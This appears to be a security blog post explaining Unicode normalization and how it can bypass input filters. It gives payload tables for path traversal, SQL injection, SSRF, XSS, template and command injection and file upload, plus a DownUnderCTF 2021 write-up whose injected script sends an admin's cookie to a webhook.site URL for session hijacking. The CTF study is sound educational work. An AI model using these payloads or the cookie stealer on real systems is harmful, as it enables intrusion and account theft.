What is Unicode?
Unicode, formally the Unicode Standard, is an information technology standard for the consistent encoding, representation, and handling of text expressed in most of the world’s writing systems.
Representation
Unicode assigns every character a numeric code point. For example, “A” is mapped to U+0041, and “a” is mapped to U+0061. Code points range from U+0000 to U+10FFFF (more than a million possible values). Unicode divides this range into 17 “planes”. The best known is the BMP (Basic Multilingual Plane), which spans U+0000 to U+FFFF; it is plane 0, and the 16 planes above it are the supplementary planes, informally called “astral planes”.
Characters in the “astral” planes do not fit in a single 16-bit code unit, so UTF-16 represents them as “surrogate pairs”.
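As a small illustration of code points and surrogate pairs, here is a sketch in Python. The helper name `utf16_units` and the choice of U+1F600 as the astral example are assumptions made for this example, not part of the original text.

```python
def utf16_units(ch: str) -> list:
    """Return the 16-bit UTF-16 code units used to encode a single character."""
    data = ch.encode("utf-16-be")
    return [int.from_bytes(data[i:i + 2], "big") for i in range(0, len(data), 2)]

# Code points for the two BMP examples.
print(f"U+{ord('A'):04X}")  # U+0041
print(f"U+{ord('a'):04X}")  # U+0061

# A BMP character needs one code unit; an astral character needs a surrogate pair.
print([f"0x{u:04X}" for u in utf16_units("A")])           # ['0x0041']
print([f"0x{u:04X}" for u in utf16_units("\U0001F600")])  # ['0xD83D', '0xDE00']
```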
Unicode equivalence
Unicode equivalence or Unicode normalization is the specification by the Unicode character encoding standard that some sequences of code points represent essentially the same character. On a more technical level, normalization ensures two strings that may use a different binary representation for their characters have the same binary value after normalization.
Canonical Equivalence
Canonical equivalent characters are assumed to have the same appearance and meaning when printed or displayed.
Compatibility Equivalence
Compatibility equivalence is a weaker equivalence, in that two values may represent the same abstract character but can be displayed differently.
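The difference between the two kinds of equivalence can be checked with Python's standard `unicodedata` module. This is a minimal sketch; the helper `equivalent` and the sample characters are chosen for illustration only.

```python
import unicodedata

def equivalent(a: str, b: str, form: str) -> bool:
    """Compare two strings after applying the given normalization form."""
    return unicodedata.normalize(form, a) == unicodedata.normalize(form, b)

composed = "\u00e9"     # é as a single code point
decomposed = "e\u0301"  # e followed by COMBINING ACUTE ACCENT
ligature = "\ufb01"     # LATIN SMALL LIGATURE FI

print(composed == decomposed)                   # False: different code points
print(equivalent(composed, decomposed, "NFC"))  # True: canonically equivalent
print(equivalent(ligature, "fi", "NFC"))        # False: not canonically equivalent
print(equivalent(ligature, "fi", "NFKC"))       # True: compatibility equivalent
```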
Normalization algorithms
The Unicode Standard defines four normalization forms: NFC, NFD, NFKC and NFKD. Each applies canonical and compatibility normalization in a different way. You can read more on the different techniques at unicode.org.
- NFC: Normalization Form Canonical Composition
- NFD: Normalization Form Canonical Decomposition
- NFKC: Normalization Form Compatibility Composition
- NFKD: Normalization Form Compatibility Decomposition
The general idea behind all of these algorithms is to “normalize” some code points to end up having the same character.
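To see how the four forms differ on the same input, the following sketch prints the code points each one produces. The sample string (a ligature followed by an accented letter) and the helper `code_points` are assumptions picked for this example.

```python
import unicodedata

def code_points(s: str) -> str:
    """Render a string as a space-separated list of U+XXXX code points."""
    return " ".join(f"U+{ord(c):04X}" for c in s)

sample = "\ufb01\u00e9"  # LATIN SMALL LIGATURE FI followed by é

for form in ("NFC", "NFD", "NFKC", "NFKD"):
    print(form, code_points(unicodedata.normalize(form, sample)))
# NFC U+FB01 U+00E9
# NFD U+FB01 U+0065 U+0301
# NFKC U+0066 U+0069 U+00E9
# NFKD U+0066 U+0069 U+0065 U+0301
```

Only the two compatibility forms (NFKC, NFKD) rewrite the ligature into plain ASCII letters, which is why they are the forms that matter for the attacks that follow.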
What is the impact?
What can we, as attackers, do with Unicode?
Path traversal
Character | Payload | After Normalization |
---|---|---|
‥ (U+2025) | ‥/‥/‥/etc/passwd | ../../../etc/passwd |
︰(U+FE30) | ︰/︰/︰/etc/passwd | ../../../etc/passwd |
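The rows above only matter when an application validates input before it normalizes it. A minimal sketch of that ordering bug, assuming a hypothetical filter `naive_is_safe` that rejects ASCII `..` and a backend that applies NFKC afterwards:

```python
import unicodedata

def naive_is_safe(path: str) -> bool:
    """Hypothetical filter: reject any path that contains an ASCII '..'."""
    return ".." not in path

payload = "\u2025/\u2025/\u2025/etc/passwd"  # uses TWO DOT LEADER (U+2025)

# Vulnerable order: the check runs on the raw input, normalization happens later.
print(naive_is_safe(payload))  # True, the filter sees no ASCII dots
normalized = unicodedata.normalize("NFKC", payload)
print(normalized)              # ../../../etc/passwd

# Safer order: normalize first, then run the same check.
print(naive_is_safe(normalized))  # False
```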
SQL Injection
Character | Payload | After Normalization |
---|---|---|
＇ (U+FF07) | ＇ or ＇1＇=＇1 | ' or '1'='1 |
＂ (U+FF02) | ＂ or ＂1＂=＂1 | " or "1"="1 |
﹣ (U+FE63) | admin'﹣﹣ | admin'-- |
Server-Side Request Forgery - SSRF
Character | Payload | After Normalization |
---|---|---|
⓪ (U+24EA) | ①②⑦.⓪.⓪.① | 127.0.0.1 |
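A sketch of how the circled-digit host could slip past a string blocklist and still resolve to loopback once normalized. The blocklist `BLOCKED_HOSTS` and the check `naive_is_allowed` are hypothetical; real SSRF filters vary widely.

```python
import ipaddress
import unicodedata

BLOCKED_HOSTS = {"127.0.0.1", "localhost"}  # hypothetical blocklist

def naive_is_allowed(host: str) -> bool:
    """Hypothetical check: plain string comparison against the blocklist."""
    return host not in BLOCKED_HOSTS

payload = "\u2460\u2461\u2466.\u24ea.\u24ea.\u2460"  # circled digits 1 2 7 . 0 . 0 . 1
normalized = unicodedata.normalize("NFKC", payload)

print(naive_is_allowed(payload))                     # True
print(normalized)                                    # 127.0.0.1
print(ipaddress.ip_address(normalized).is_loopback)  # True
```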
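Open Redirect
Character | Payload | After Normalization |
---|---|---|
。 (U+3002) | lazarv。com | lazarv.com |
／ (U+FF0F) | ／／lazarv.com | //lazarv.com |
Note that U+3002 has no compatibility decomposition, so NFKC leaves it unchanged; it becomes “.” through the IDNA (UTS #46) mapping that browsers and URL parsers apply to host names. The fullwidth full stop ． (U+FF0E) is the variant that NFKC itself maps to “.”.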
Cross Site Scripting - XSS
Character | Payload | After Normalization |
---|---|---|
＜ (U+FF1C) | ＜script src=a/＞ | <script src=a/> |
＂ (U+FF02) | ＂onclick='prompt(1)' | "onclick='prompt(1)' |
Template Injection - SSTI and CSTI
Character | Payload | After Normalization |
---|---|---|
﹛ (U+FE5B) | ﹛﹛3+3﹜﹜ | {{3+3}} |
［ (U+FF3B) | ［［5+5］］ | [[5+5]] |
OS Command Injection
Character | Payload | After Normalization |
---|---|---|
＆ (U+FF06) | ＆＆whoami | &&whoami |
｜ (U+FF5C) | ｜｜ whoami | \|\| whoami |
Arbitrary file upload
Character | Payload | After Normalization |
---|---|---|
ｐ (U+FF50) ʰ (U+02B0) | shell.ｐʰｐ | shell.php |
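Tables like the ones above can be rebuilt for any target character by scanning the code space for characters whose NFKC form equals it. A rough sketch, with the function name `nfkc_sources` being an assumption for this example; the exact results depend on the Unicode version bundled with the Python interpreter.

```python
import sys
import unicodedata

def nfkc_sources(target: str) -> list:
    """List characters (other than target) that NFKC normalizes to target."""
    found = []
    for cp in range(sys.maxunicode + 1):
        if 0xD800 <= cp <= 0xDFFF:  # skip surrogate code points
            continue
        ch = chr(cp)
        if ch != target and unicodedata.normalize("NFKC", ch) == target:
            found.append(ch)
    return found

for ch in nfkc_sources("<"):
    print(f"U+{ord(ch):04X}", unicodedata.name(ch, "?"))
```

The scan walks roughly a million code points, so it takes a moment; caching the result per target would be a reasonable refinement.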
Chain reaction writeup from DownUnderCTF 2021
Upon visiting the main page, we see an option to register or log in:
Register any account and log in:
After logging in, we are presented with the option to visit our profile in the upper right corner of the page:
On our profile page, we’re able to update our username and “About me” text with the ability to report the current page to admin:
This might be an opportunity to XSS the page, but after inserting <script>alert(1)</script> I get redirected to this page:
At this point, we know that some kind of input sanitization or character blacklisting is being performed. After some trial and error, I decided to try replacing the blacklisted characters with Unicode equivalents taken from a Unicode normalization reference table.
I intercepted the update request in Burp Suite and successfully broke out of the surrounding HTML by injecting ""> test with the quotes and the angle bracket replaced by their Unicode equivalents:
username=lazar&aboutme=%ef%bc%82%ef%bc%82%ef%b9%a5 test
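The percent-encoded bytes in the request body above are the UTF-8 encodings of U+FF02 (fullwidth quotation mark) and U+FE65 (small greater-than sign). A sketch of how such a value could be generated; the mapping `EQUIVALENTS` and the helper `encode_payload` are assumptions for illustration and cover only the characters used here.

```python
from urllib.parse import quote

# ASCII character -> look-alike that NFKC folds back to it (illustrative subset).
EQUIVALENTS = str.maketrans({'"': "\uff02", ">": "\ufe65", "<": "\ufe64"})

def encode_payload(ascii_payload: str) -> str:
    """Swap in the Unicode look-alikes, then percent-encode everything but spaces."""
    return quote(ascii_payload.translate(EQUIVALENTS), safe=" ")

print(encode_payload('""> test'))  # %EF%BC%82%EF%BC%82%EF%B9%A5 test
```

`quote` emits uppercase hex digits; percent-encoding is case-insensitive, so this is the same value as the lowercase form in the request.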
This means that I can inject a simple cookie stealer which will send me the cookie in base64 and enable me to log in as the admin when he reviews the reported page. I injected the following JavaScript PoC:
%ef%bc%82%ef%bc%82%ef%b9%a5%ef%b9%a4scri%e1%b5%96t%ef%b9%a5 var i = new Image(); i.src='https://webhook.site/MYID?' %2b btoa(document.cookie) %ef%b9%a4/scri%e1%b5%96t%ef%b9%a5
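Which, after URL decoding and normalization, translates to:
""><script> var i = new Image(); i.src='https://webhook.site/MYID?' + btoa(document.cookie) </script>
Here I am creating a new image element and setting its src attribute to point to a webhook URL I created, with the user’s cookie appended. The cookie is read from the document.cookie property and encoded to base64 with the native JavaScript function btoa. Note that the script keyword is blacklisted, so I had to replace the p with a Unicode equivalent (ᵖ, U+1D56).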
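The translation of the PoC can be reproduced offline. The sketch below assumes the server URL-decodes the body and then applies NFKC; the writeup does not state which normalization form the application actually used, so treat that as an assumption.

```python
import unicodedata
from urllib.parse import unquote

raw = (
    "%ef%bc%82%ef%bc%82%ef%b9%a5%ef%b9%a4scri%e1%b5%96t%ef%b9%a5 "
    "var i = new Image(); i.src='https://webhook.site/MYID?' "
    "%2b btoa(document.cookie) %ef%b9%a4/scri%e1%b5%96t%ef%b9%a5"
)

decoded = unquote(raw)                               # still contains the look-alikes
normalized = unicodedata.normalize("NFKC", decoded)  # assumed server-side step

print("<script" in decoded)     # False: a blacklist on the raw input sees nothing
print("<script" in normalized)  # True: the tag appears only after normalization
print(normalized)
```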
After I pressed the “Report Error” button on the page, my webhook received a request with the base64 value appended:
Decoding the base64 gives the admin-cookie value:
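The decoding step can be done with Python's `base64` module. In this sketch the exfiltrated string is built from the placeholder `admin-cookie=COOKIE_VALUE` purely for illustration; it is not the value captured during the challenge.

```python
import base64

# Placeholder standing in for whatever btoa(document.cookie) produced; not a real value.
exfiltrated = base64.b64encode(b"admin-cookie=COOKIE_VALUE").decode("ascii")

cookie = base64.b64decode(exfiltrated).decode("utf-8")
name, _, value = cookie.partition("=")
print(name)   # admin-cookie
print(value)  # COOKIE_VALUE
```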
I applied the cookie to my current session by opening developer tools and executing the following:
document.cookie = "admin-cookie=COOKIE_VALUE"
Now we are able to access the /admin endpoint, which holds the flag: